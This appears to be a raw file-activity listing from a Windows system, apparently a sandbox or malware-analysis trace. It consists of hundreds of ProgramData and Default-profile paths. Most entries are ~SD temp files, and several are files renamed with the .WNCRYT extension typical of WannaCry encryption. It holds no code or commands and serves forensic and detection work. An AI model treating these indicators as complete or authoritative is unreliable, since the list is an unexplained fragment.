file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\~SD7EF3.tmp
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\LICENSE.txt.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\~SD7F71.tmp
file: C:\Users\All Users\chocolatey\lib\chocolatey\~SD7FA0.tmp
file: C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\~SD7FD0.tmp
file: C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\~SD7FF1.tmp
file: C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\~SD805F.tmp
file: C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\~SD80AE.tmp
file: C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\~SD80FD.tmp
file: C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\~SD814C.tmp
file: C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\~SD817C.tmp
file: C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\~SD81CB.tmp
file: C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\~SD820B.tmp
file: C:\Users\All Users\chocolatey\lib\dotnet\~SD822B.tmp
file: C:\Users\All Users\chocolatey\lib\dotnet-5.0-runtime\~SD828A.tmp
file: C:\Users\All Users\chocolatey\lib\dotnet-5.0-runtime\tools\~SD82AA.tmp
file: C:\Users\All Users\chocolatey\lib\dotnet-6.0-runtime\~SD82EA.tmp
file: C:\Users\All Users\chocolatey\lib\dotnet-6.0-runtime\tools\~SD830A.tmp
file: C:\Users\All Users\chocolatey\lib\dotnet-runtime\~SD831A.tmp
file: C:\Users\All Users\chocolatey\lib\dotnetfx\~SD832B.tmp
file: C:\Users\All Users\chocolatey\lib\dotnetfx\tools\~SD832C.tmp
file: C:\Users\All Users\chocolatey\lib\Firefox\~SD833D.tmp
file: C:\Users\All Users\chocolatey\lib\Firefox\tools\~SD834D.tmp
file: C:\Users\All Users\chocolatey\lib\Firefox\tools\LanguageChecksums.csv.WNCRYT
file: C:\Users\All Users\chocolatey\lib\GoogleChrome\~SD83AC.tmp
file: C:\Users\All Users\chocolatey\lib\GoogleChrome\tools\~SD83DC.tmp
file: C:\Users\All Users\chocolatey\lib\jre8\~SD843B.tmp
file: C:\Users\All Users\chocolatey\lib\jre8\tools\~SD847A.tmp
file: C:\Users\All Users\chocolatey\lib\KB2919355\~SD84E9.tmp
file: C:\Users\All Users\chocolatey\lib\KB2919355\tools\~SD8538.tmp
file: C:\Users\All Users\chocolatey\lib\KB2919442\~SD8539.tmp
file: C:\Users\All Users\chocolatey\lib\KB2919442\tools\~SD853A.tmp
file: C:\Users\All Users\chocolatey\lib\KB2999226\~SD8589.tmp
file: C:\Users\All Users\chocolatey\lib\KB2999226\tools\~SD85B9.tmp
file: C:\Users\All Users\chocolatey\lib\KB3033929\~SD8627.tmp
file: C:\Users\All Users\chocolatey\lib\KB3033929\Tools\~SD8686.tmp
file: C:\Users\All Users\chocolatey\lib\KB3035131\~SD86D5.tmp
file: C:\Users\All Users\chocolatey\lib\KB3035131\Tools\~SD86F5.tmp
file: C:\Users\All Users\chocolatey\lib\KB3063858\~SD8735.tmp
file: C:\Users\All Users\chocolatey\lib\KB3063858\Tools\~SD8765.tmp
file: C:\Users\All Users\chocolatey\lib\KB3118401\~SD87B4.tmp
file: C:\Users\All Users\chocolatey\lib\KB3118401\Tools\~SD87E4.tmp
file: C:\Users\All Users\chocolatey\lib\OfficeProPlus2013\~SD87E5.tmp
file: C:\Users\All Users\chocolatey\lib\OfficeProPlus2013\tools\~SD87F5.tmp
file: C:\Users\All Users\chocolatey\lib\openjdk\~SD8806.tmp
file: C:\Users\All Users\chocolatey\lib\openjdk\openjdk-19.0.1_windows-x64_bin.zip.txt.WNCRYT
file: C:\Users\All Users\chocolatey\lib\openjdk\tools\~SD8884.tmp
file: C:\Users\All Users\chocolatey\lib\powershell-core\~SD8894.tmp
file: C:\Users\All Users\chocolatey\lib\powershell-core\tools\~SD88B5.tmp
file: C:\Users\All Users\chocolatey\lib\powershell-core\tools\ThirdPartyNotices.txt.WNCRYT
file: C:\Users\All Users\chocolatey\lib\python3\~SD8904.tmp
file: C:\Users\All Users\chocolatey\lib\python3\legal\~SD8914.tmp
file: C:\Users\All Users\chocolatey\lib\python3\legal\LICENSE.txt.WNCRYT
file: C:\Users\All Users\chocolatey\lib\python3\tools\~SD8944.tmp
file: C:\Users\All Users\chocolatey\lib\tapwindows\~SD8955.tmp
file: C:\Users\All Users\chocolatey\lib\tapwindows\tools\~SD8966.tmp
file: C:\Users\All Users\chocolatey\lib\vcredist140\~SD8976.tmp
file: C:\Users\All Users\chocolatey\lib\vcredist140\tools\~SD89A6.tmp
file: C:\Users\All Users\chocolatey\lib\vcredist2005\~SD89B7.tmp
file: C:\Users\All Users\chocolatey\lib\vcredist2005\tools\~SD89C7.tmp
file: C:\Users\All Users\chocolatey\lib\vcredist2008\~SD89C8.tmp
file: C:\Users\All Users\chocolatey\lib\vcredist2008\tools\~SD89E9.tmp
file: C:\Users\All Users\chocolatey\lib\vcredist2015\~SD8A28.tmp
file: C:\Users\All Users\chocolatey\lib\winrar\~SD8A96.tmp
file: C:\Users\All Users\chocolatey\lib\winrar\tools\~SD8AD6.tmp
file: C:\Users\All Users\chocolatey\lib\winrar\tools\downloadInfo.csv.WNCRYT
file: C:\Users\All Users\chocolatey\lib-bad\~SD8B44.tmp
file: C:\Users\All Users\chocolatey\lib-bad\adobereader\~SD8BA3.tmp
file: C:\Users\All Users\chocolatey\lib-bad\adobereader\tools\~SD8BE3.tmp
file: C:\Users\All Users\chocolatey\logs\~SD8C41.tmp
file: C:\Users\All Users\chocolatey\redirects\~SD8C90.tmp
file: C:\Users\All Users\chocolatey\tools\~SD8D4D.tmp
file: C:\Users\All Users\chocolatey\tools\7zip.license.txt.WNCRYT
file: C:\Users\All Users\chocolatey\tools\shimgen.license.txt.WNCRYT
file: C:\Users\All Users\Microsoft\~SD8E19.tmp
file: C:\Users\All Users\Microsoft\Assistance\~SD8EA7.tmp
file: C:\Users\All Users\Microsoft\Assistance\Client\~SD8EB7.tmp
file: C:\Users\All Users\Microsoft\Assistance\Client\1.0\~SD8EF7.tmp
file: C:\Users\All Users\Microsoft\Assistance\Client\1.0\en-US\~SD8F17.tmp
file: C:\Users\All Users\Microsoft\ClickToRun\~SD8F47.tmp
file: C:\Users\All Users\Microsoft\ClickToRun\MachineData\~SD8F48.tmp
file: C:\Users\All Users\Microsoft\ClickToRun\MachineData\Catalog\~SD8F49.tmp
file: C:\Users\All Users\Microsoft\ClickToRun\MachineData\Catalog\Packages\~SD8F4A.tmp
file: C:\Users\All Users\Microsoft\ClickToRun\MachineData\Catalog\Packages\{9AC08E99-230B-47E8-9721-4577B7F124EA}\~SD8F4B.tmp
file: C:\Users\All Users\Microsoft\ClickToRun\MachineData\Catalog\Packages\{9AC08E99-230B-47E8-9721-4577B7F124EA}\{1A8308C7-90D1-4200-B16E-646F163A08E8}\~SD8F5C.tmp
file: C:\Users\All Users\Microsoft\ClickToRun\MachineData\Integration\~SD8F6C.tmp
file: C:\Users\All Users\Microsoft\ClickToRun\MachineData\Integration\ShortcutBackups\~SD8F8C.tmp
file: C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\~SD8FDC.tmp
file: C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\1769D00C-76B0-44E0-A548-8DB5C12F3A69\~SD902B.tmp
file: C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\1769D00C-76B0-44E0-A548-8DB5C12F3A69\en-us.16\~SD90E7.tmp
file: C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\1769D00C-76B0-44E0-A548-8DB5C12F3A69\x-none.16\~SD9117.tmp
file: C:\Users\All Users\Microsoft\ClickToRun\UserData\~SD9147.tmp
file: C:\Users\All Users\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\~SD9186.tmp
file: C:\Users\All Users\Microsoft\Crypto\~SD91B6.tmp
file: C:\Users\All Users\Microsoft\Crypto\DSS\~SD91B7.tmp
file: C:\Users\All Users\Microsoft\Crypto\DSS\MachineKeys\~SD91B8.tmp
file: C:\Users\All Users\Microsoft\Crypto\Keys\~SD91B9.tmp
file: C:\Users\All Users\Microsoft\Crypto\PCPKSP\~SD91BA.tmp
file: C:\Users\All Users\Microsoft\Crypto\PCPKSP\WindowsAIK\~SD91BB.tmp
file: C:\Users\All Users\Microsoft\Crypto\RSA\~SD91BC.tmp
file: C:\Users\All Users\Microsoft\Crypto\RSA\MachineKeys\~SD91BD.tmp
file: C:\Users\All Users\Microsoft\Crypto\RSA\S-1-5-18\~SD91CE.tmp
file: C:\Users\All Users\Microsoft\Device Stage\~SD91CF.tmp
file: C:\Users\All Users\Microsoft\Device Stage\Device\~SD91D0.tmp
file: C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\~SD91D1.tmp
file: C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\~SD91D2.tmp
file: C:\Users\All Users\Microsoft\Device Stage\Task\~SD91D3.tmp
file: C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\~SD91D4.tmp
file: C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\~SD91F4.tmp
file: C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\~SD9272.tmp
file: C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\~SD92B2.tmp
file: C:\Users\All Users\Microsoft\DeviceSync\~SD92D2.tmp
file: C:\Users\All Users\Microsoft\Diagnosis\~SD9302.tmp
file: C:\Users\All Users\Microsoft\Diagnosis\AsimovUploader\~SD9341.tmp
file: C:\Users\All Users\Microsoft\Diagnosis\DownloadedScenarios\~SD93B0.tmp
file: C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\~SD93FF.tmp
file: C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\~SD943E.tmp
file: C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\AutoLogger\~SD945F.tmp
file: C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\~SD94AE.tmp
file: C:\Users\All Users\Microsoft\Diagnosis\LocalTraceStore\~SD951C.tmp
file: C:\Users\All Users\Microsoft\Diagnosis\Sideload\~SD955C.tmp
file: C:\Users\All Users\Microsoft\DRM\~SD958B.tmp
file: C:\Users\All Users\Microsoft\DRM\Server\~SD95DB.tmp
file: C:\Users\All Users\Microsoft\EdgeUpdate\~SD962A.tmp
file: C:\Users\All Users\Microsoft\EdgeUpdate\Log\~SD9669.tmp
file: C:\Users\All Users\Microsoft\eHome\~SD9689.tmp
file: C:\Users\All Users\Microsoft\eHome\logs\~SD96E8.tmp
file: C:\Users\All Users\Microsoft\Event Viewer\~SD9737.tmp
file: C:\Users\All Users\Microsoft\Event Viewer\Applications and Services Logs\~SD9767.tmp
file: C:\Users\All Users\Microsoft\Event Viewer\Applications and Services Logs\Microsoft\~SD9797.tmp
file: C:\Users\All Users\Microsoft\Event Viewer\Applications and Services Logs\Microsoft\Windows\~SD97D7.tmp
file: C:\Users\All Users\Microsoft\Event Viewer\Applications and Services Logs\Microsoft\Windows\Sysmon\~SD9835.tmp
file: C:\Users\All Users\Microsoft\Event Viewer\Views\~SD9884.tmp
file: C:\Users\All Users\Microsoft\Event Viewer\Views\ApplicationViewsRootNode\~SD98F3.tmp
file: C:\Users\All Users\Microsoft\IdentityCRL\~SD9913.tmp
file: C:\Users\All Users\Microsoft\Media Player\~SD9924.tmp
file: C:\Users\All Users\Microsoft\MF\~SD9925.tmp
file: C:\Users\All Users\Microsoft\Microsoft Security Client\~SD9926.tmp
file: C:\Users\All Users\Microsoft\Microsoft Security Client\Support\~SD9956.tmp
file: C:\Users\All Users\Microsoft\NetFramework\~SD9976.tmp
file: C:\Users\All Users\Microsoft\NetFramework\BreadcrumbStore\~SD99E4.tmp
file: C:\Users\All Users\Microsoft\Network\~SD9AC0.tmp
file: C:\Users\All Users\Microsoft\Network\Connections\~SD9B0F.tmp
file: C:\Users\All Users\Microsoft\Network\Downloader\~SD9B3F.tmp
file: C:\Users\All Users\Microsoft\Office\~SD9B6F.tmp
file: C:\Users\All Users\Microsoft\OfficeSoftwareProtectionPlatform\~SD9BED.tmp
file: C:\Users\All Users\Microsoft\OfficeSoftwareProtectionPlatform\Cache\~SD9C6B.tmp
file: C:\Users\All Users\Microsoft\RAC\~SD9CCA.tmp
file: C:\Users\All Users\Microsoft\RAC\Outbound\~SD9D19.tmp
file: C:\Users\All Users\Microsoft\RAC\PublishedData\~SD9D39.tmp
file: C:\Users\All Users\Microsoft\RAC\StateData\~SD9DA7.tmp
file: C:\Users\All Users\Microsoft\RAC\Temp\~SD9DF6.tmp
file: C:\Users\All Users\Microsoft\Search\~SD9E26.tmp
file: C:\Users\All Users\Microsoft\Search\Data\~SD9E66.tmp
file: C:\Users\All Users\Microsoft\Search\Data\Applications\~SD9EC5.tmp
file: C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\~SD9EC6.tmp
file: C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Config\~SD9ED6.tmp
file: C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\GatherLogs\~SD9ED7.tmp
file: C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex\~SD9ED8.tmp
file: C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\~SD9ED9.tmp
file: C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\~SD9EDA.tmp
file: C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\~SD9EDB.tmp
file: C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\~SD9EDC.tmp
file: C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\~SD9EFC.tmp
file: C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\SecStore\~SD9EFD.tmp
file: C:\Users\All Users\Microsoft\Search\Data\Temp\~SD9EFE.tmp
file: C:\Users\All Users\Microsoft\Search\Data\Temp\usgthrsvc\~SD9F0F.tmp
file: C:\Users\All Users\Microsoft\User Account Pictures\~SD9F10.tmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\~SD9F11.tmp
file: C:\Users\All Users\Microsoft\Vault\~SD9F12.tmp
file: C:\Users\All Users\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\~SD9F13.tmp
file: C:\Users\All Users\Microsoft\Windows\~SD9F24.tmp
file: C:\Users\All Users\Microsoft\Windows\AIT\~SD9F25.tmp
file: C:\Users\All Users\Microsoft\Windows\Caches\~SD9F26.tmp
file: C:\Users\All Users\Microsoft\Windows\DeviceMetadataStore\~SD9F27.tmp
file: C:\Users\All Users\Microsoft\Windows\DeviceMetadataStore\en-US\~SD9F28.tmp
file: C:\Users\All Users\Microsoft\Windows\DRM\~SD9F58.tmp
file: C:\Users\All Users\Microsoft\Windows\DRM\Cache\~SD9F97.tmp
file: C:\Users\All Users\Microsoft\Windows\GameExplorer\~SD9FE6.tmp
file: C:\Users\All Users\Microsoft\Windows\Power Efficiency Diagnostics\~SDA035.tmp
file: C:\Users\All Users\Microsoft\Windows\Ringtones\~SDA0C3.tmp
file: C:\Users\All Users\Microsoft\Windows\Sqm\~SDA1BE.tmp
file: C:\Users\All Users\Microsoft\Windows\Sqm\Manifest\~SDA1DE.tmp
file: C:\Users\All Users\Microsoft\Windows\Sqm\Sessions\~SDA21E.tmp
file: C:\Users\All Users\Microsoft\Windows\Sqm\Upload\~SDA22E.tmp
file: C:\Users\All Users\Microsoft\Windows\Start Menu\~SDA22F.tmp
file: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\~SDA230.tmp
file: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\7-Zip\~SDA260.tmp
file: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\~SDA2BF.tmp
file: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\~SDA2FE.tmp
file: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\~SDA33E.tmp
file: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\~SDA35E.tmp
file: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\~SDA3AD.tmp
file: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\~SDA3DD.tmp
file: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\AutoHotkey\~SDA3FD.tmp
file: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Boxstarter\~SDA3FE.tmp
file: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Games\~SDA40F.tmp
file: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Java\~SDA420.tmp
file: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Maintenance\~SDA421.tmp
file: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2016 Tools\~SDA422.tmp
file: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\PowerShell\~SDA432.tmp
file: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Python 3.8\~SDA433.tmp
file: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\~SDA434.tmp
file: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\WinRAR\~SDA445.tmp
file: C:\Users\All Users\Microsoft\Windows\Templates\~SDA456.tmp
file: C:\Users\All Users\Microsoft\Windows\WER\~SDA4A5.tmp
file: C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\~SDA4F4.tmp
file: C:\Users\All Users\Microsoft\Windows\WER\ReportQueue\~SDA543.tmp
file: C:\Users\All Users\Microsoft\Windows Defender\~SDA563.tmp
file: C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\~SDA583.tmp
file: C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Backup\~SDA584.tmp
file: C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Updates\~SDA585.tmp
file: C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\{8AF8DC04-1885-4F22-8F09-BD1E568EBC7A}\~SDA586.tmp
file: C:\Users\All Users\Microsoft\Windows Defender\LocalCopy\~SDA587.tmp
file: C:\Users\All Users\Microsoft\Windows Defender\Quarantine\~SDA588.tmp
file: C:\Users\All Users\Microsoft\Windows Defender\Scans\~SDA5B8.tmp
file: C:\Users\All Users\Microsoft\Windows Defender\Scans\History\~SDA694.tmp
file: C:\Users\All Users\Microsoft\Windows Defender\Scans\History\CacheManager\~SDA6F3.tmp
file: C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Results\~SDA742.tmp
file: C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Results\Resource\~SDA791.tmp
file: C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Service\~SDA7D1.tmp
file: C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Store\~SDA7D2.tmp
file: C:\Users\All Users\Microsoft\Windows Defender\Support\~SDA7E2.tmp
file: C:\Users\All Users\Microsoft\Windows NT\~SDA7E3.tmp
file: C:\Users\All Users\Microsoft\Windows NT\MSFax\~SDA7E4.tmp
file: C:\Users\All Users\Microsoft\Windows NT\MSFax\ActivityLog\~SDA7E5.tmp
file: C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\~SDA7E6.tmp
file: C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\~SDA7E7.tmp
file: C:\Users\All Users\Microsoft\Windows NT\MSFax\Inbox\~SDA7F8.tmp
file: C:\Users\All Users\Microsoft\Windows NT\MSFax\Queue\~SDA7F9.tmp
file: C:\Users\All Users\Microsoft\Windows NT\MSFax\SentItems\~SDA7FA.tmp
file: C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\~SDA7FB.tmp
file: C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\~SDA7FC.tmp
file: C:\Users\All Users\Microsoft\Windows NT\MSScan\~SDA7FD.tmp
file: C:\Users\All Users\Microsoft\Windows NT\MSScan\WelcomeScan.jpg.WNCRYT
file: C:\Users\All Users\Microsoft\WwanSvc\~SDA83C.tmp
file: C:\Users\All Users\Microsoft OneDrive\~SDA83E.tmp
file: C:\Users\All Users\Microsoft OneDrive\setup\~SDA83F.tmp
file: C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\~SDA8CD.tmp
file: C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\~SDA8FD.tmp
file: C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\~SDA95C.tmp
file: C:\Users\All Users\Oracle\~SDA9AB.tmp
file: C:\Users\All Users\Oracle\Java\~SDA9FA.tmp
file: C:\Users\All Users\Oracle\Java\installcache\~SDAA2A.tmp
file: C:\Users\All Users\Oracle\Java\installcache_x64\~SDAA88.tmp
file: C:\Users\All Users\Package Cache\~SDAC7D.tmp
file: C:\Users\All Users\Package Cache\{0627E042-BBD1-4FE2-AAEF-C54BA4A69326}v3.8.10150.0\~SDAD1B.tmp
file: C:\Users\All Users\Package Cache\{08c3379c-d122-42a4-917e-b3dc470fbcb3}\~SDAD1C.tmp
file: C:\Users\All Users\Package Cache\{21F60B75-2A5E-4064-A38A-D59A347B4433}v3.8.10150.0\~SDAD1D.tmp
file: C:\Users\All Users\Package Cache\{2dd73f73-784c-4c71-9495-fd11cd6eddf6}\~SDAD1E.tmp
file: C:\Users\All Users\Package Cache\{3407B900-37F5-4CC2-B612-5CD5D580A163}v14.32.31332\~SDAD3E.tmp
file: C:\Users\All Users\Package Cache\{3407B900-37F5-4CC2-B612-5CD5D580A163}v14.32.31332\packages\~SDAD8D.tmp
file: C:\Users\All Users\Package Cache\{3407B900-37F5-4CC2-B612-5CD5D580A163}v14.32.31332\packages\vcRuntimeMinimum_amd64\~SDADEC.tmp
file: C:\Users\All Users\Package Cache\{3746f21b-c990-4045-bb33-1cf98cff7a68}\~SDAE99.tmp
file: C:\Users\All Users\Package Cache\{4196628C-AE5C-4304-B166-B7C1E93CDC25}v3.8.10150.0\~SDAF07.tmp
file: C:\Users\All Users\Package Cache\{4AF94EBC-F592-4502-B0EA-07764E7F820B}v3.8.10150.0\~SDAF47.tmp
file: C:\Users\All Users\Package Cache\{4CA4F71B-58C3-42ED-83FA-AD7AC9E9C0CB}v48.47.50420\~SDAF96.tmp
file: C:\Users\All Users\Package Cache\{54DE7EA9-E391-4BD2-A373-3A72A18EBDB5}v40.68.31213\~SDAFE5.tmp
file: C:\Users\All Users\Package Cache\{59650A2A-3839-46EC-9D9C-6B3B1C743C55}v40.68.31213\~SDB024.tmp
file: C:\Users\All Users\Package Cache\{5A66E598-37BD-4C8A-A7CB-A71C32ABCD78}v40.68.31213\~SDB054.tmp
file: C:\Users\All Users\Package Cache\{5E63E49B-C88C-46C5-855C-A7B07C11CDC8}v48.47.50420\~SDB074.tmp
file: C:\Users\All Users\Package Cache\{81CDF5BF-4777-4CF8-B6CC-0902061F7314}v3.8.7427.0\~SDB0C4.tmp
file: C:\Users\All Users\Package Cache\{8972AC25-452E-4FFE-945A-EB9E28C20322}v14.32.31332\~SDB113.tmp
file: C:\Users\All Users\Package Cache\{8972AC25-452E-4FFE-945A-EB9E28C20322}v14.32.31332\packages\~SDB162.tmp
file: C:\Users\All Users\Package Cache\{8972AC25-452E-4FFE-945A-EB9E28C20322}v14.32.31332\packages\vcRuntimeAdditional_x86\~SDB1A1.tmp
file: C:\Users\All Users\Package Cache\{8BA25391-0BE6-443A-8EBF-86A29BAFC479}v40.68.31213\~SDB200.tmp
file: C:\Users\All Users\Package Cache\{94EE74AD-4205-4038-8748-000D966FA407}v48.47.50420\~SDB24F.tmp
file: C:\Users\All Users\Package Cache\{a699b48e-5748-4980-ad92-0b61b1d9d718}\~SDB26F.tmp
file: C:\Users\All Users\Package Cache\{a98dc6ff-d360-4878-9f0a-915eba86eaf3}\~SDB2FD.tmp
file: C:\Users\All Users\Package Cache\{AEAA18F7-9C96-4A43-BC07-8B88A4913EEB}v14.32.31332\~SDB32D.tmp
file: C:\Users\All Users\Package Cache\{AEAA18F7-9C96-4A43-BC07-8B88A4913EEB}v14.32.31332\packages\~SDB34D.tmp
file: C:\Users\All Users\Package Cache\{AEAA18F7-9C96-4A43-BC07-8B88A4913EEB}v14.32.31332\packages\vcRuntimeMinimum_x86\~SDB36D.tmp
file: C:\Users\All Users\Package Cache\{AF01038B-6523-4EA7-9D9E-4F1E2927D88B}v40.68.31213\~SDB3CC.tmp
file: C:\Users\All Users\Package Cache\{B87AB233-E9C5-4459-8E4A-952EACECCFC4}v48.47.50420\~SDB40C.tmp
file: C:\Users\All Users\Package Cache\{B92B890A-04F2-4880-BA20-20D4364FB263}v48.47.50420\~SDB42C.tmp
file: C:\Users\All Users\Package Cache\{C3DD1448-513A-4DB8-978D-6991562EA63D}v48.47.50420\~SDB46B.tmp
file: C:\Users\All Users\Package Cache\{CD1C027B-BC87-4C8E-993D-1779A12BF141}v3.8.10150.0\~SDB4AB.tmp
file: C:\Users\All Users\Package Cache\{D9D74D16-6E0C-417B-AA63-557EEED5AED1}v3.8.10150.0\~SDB4CB.tmp
file: C:\Users\All Users\Package Cache\{DF5D4A27-B019-41FB-ACA8-62EE9947F452}v3.8.10150.0\~SDB50B.tmp
file: C:\Users\All Users\Package Cache\{E663ED1E-899C-40E8-91D0-8D37B95E3C69}v40.68.31213\~SDB53B.tmp
file: C:\Users\All Users\Package Cache\{E8900394-218B-459F-98DC-75B0FD88CC80}v3.8.10150.0\~SDB58A.tmp
file: C:\Users\All Users\Package Cache\{EFDAD3B5-AE93-48A4-BE3E-40EEFC4F100A}v3.8.10150.0\~SDB5BA.tmp
file: C:\Users\All Users\Package Cache\{efe3bb1e-6444-4bc0-9edd-7e5bae77965b}\~SDB5DA.tmp
file: C:\Users\All Users\Package Cache\{F4499EE3-A166-496C-81BB-51D1BCDC70A9}v14.32.31332\~SDB639.tmp
file: C:\Users\All Users\Package Cache\{F4499EE3-A166-496C-81BB-51D1BCDC70A9}v14.32.31332\packages\~SDB659.tmp
file: C:\Users\All Users\Package Cache\{F4499EE3-A166-496C-81BB-51D1BCDC70A9}v14.32.31332\packages\vcRuntimeAdditional_amd64\~SDB689.tmp
file: C:\Users\All Users\Package Cache\{F51469FB-F088-479B-BD5A-70A9C557FE6F}v3.8.10150.0\~SDB6C8.tmp
file: C:\Users\All Users\regid.1991-06.com.microsoft\~SDB727.tmp
file: C:\Users\All Users\shimgen\~SDB795.tmp
file: C:\Users\All Users\shimgen\generatedfiles\~SDB7D5.tmp
file: C:\Users\Default\~SDB7F5.tmp
file: C:\Users\Default\AppData\~SDB825.tmp
file: C:\Users\Default\AppData\Local\~SDB836.tmp
file: C:\Users\Default\AppData\Local\Microsoft\~SDB865.tmp
file: C:\Users\Default\AppData\Local\Microsoft\Windows\~SDB8A5.tmp
file: C:\Users\Default\AppData\Local\Microsoft\Windows\GameExplorer\~SDB8E4.tmp
file: C:\Users\Default\AppData\Local\Microsoft\Windows\History\~SDB905.tmp
file: C:\Users\Default\AppData\Roaming\~SDB915.tmp
file: C:\Users\Default\AppData\Roaming\Media Center Programs\~SDB955.tmp
file: C:\Users\Default\AppData\Roaming\Microsoft\~SDB985.tmp
file: C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\~SDB9A5.tmp
file: C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\~SDB9D5.tmp
file: C:\Users\Default\AppData\Roaming\Microsoft\Windows\~SDBA14.tmp
file: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies\~SDBA35.tmp
file: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\~SDBA64.tmp
file: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\~SDBA94.tmp
file: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\~SDBAB5.tmp
file: C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\~SDBAE4.tmp
file: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\~SDBB14.tmp
file: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\~SDBB54.tmp
file: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\~SDBBD2.tmp
file: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\~SDBBF2.tmp
file: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\~SDBC22.tmp
file: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\~SDBC52.tmp
file: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\~SDBC53.tmp
file: C:\Users\Default\Desktop\~SDBC54.tmp
file: C:\Users\Default\Documents\~SDBC55.tmp
file: C:\Users\Default\Downloads\~SDBC56.tmp
